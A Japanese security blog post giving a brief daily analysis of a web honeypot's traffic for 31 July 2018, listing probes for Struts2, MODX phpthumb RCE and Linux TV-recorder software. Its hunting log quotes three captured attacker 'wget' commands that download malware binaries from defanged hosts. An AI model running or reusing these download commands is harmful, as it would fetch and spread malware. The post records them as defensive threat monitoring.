S-Owl

S(ecurity)Owl

WOWHoneypotの簡易分析(58日目)

WOWhoneypotの2018-07-31(運用 日目)の簡易分析です。
本日の総アクセス件数は 56件です。また少ないです。
以下が全アクセスログです。

40 2018-07-31 GET /
7 2018-07-31 GET /index.action
1 2018-07-31 GET /.well-known/security.txt
1 2018-07-31 GET /sitemap.xml
1 2018-07-31 GET /robots.txt
1 2018-07-31 GET /manager/html
1 2018-07-31 GET hxxp://112.124.116.170:83/index.php
1 2018-07-31 GET /foltia/
1 2018-07-31 GET /favicon.ico
1 2018-07-31 GET /epgrec/do-record.sh
1 2018-07-31 GET /connectors/system/phpthumb.php

phpMyAdmin関連(0件)と/を除外したアクセス数です。

7 2018-07-31 GET /index.action
1 2018-07-31 GET /.well-known/security.txt
1 2018-07-31 GET /sitemap.xml
1 2018-07-31 GET /robots.txt
1 2018-07-31 GET /manager/html
1 2018-07-31 GET hxxp://112.124.116.170:83/index.php
1 2018-07-31 GET /foltia/
1 2018-07-31 GET /favicon.ico
1 2018-07-31 GET /epgrec/do-record.sh
1 2018-07-31 GET /connectors/system/phpthumb.php

「GET /index.action」はStruts2脆弱性を攻撃するもの。
「GET /foltia/」はfoltia ANIME LOCKERというLinux向けのアニメ録画用のOSSパッケージの調査行為、「GET /epgrec/do-record.sh」もLinuxベースでphpMySQLを使っている録画予約システムへの調査行為です。

「/connectors/system/phpthumb.php」はオープンソースCMSModx Revolution のRemote Code Executionのようです。7/18に出たもののようです。
https://www.exploit-db.com/exploits/45055/

その他はサイトに対する調査行為と思われます。

 

本日のハンティングログは以下です。

2 2018-07-31 wget -P /tmp hxxp://hfs.mhacker[.]cc:9278/Linux.server
2 2018-07-31 wget -c hxxp://103.55.13[.]68:81/server
1 2018-07-31 wget -c hxxp://aaa.linuxa[.]club:57843/linux 

 

以上です。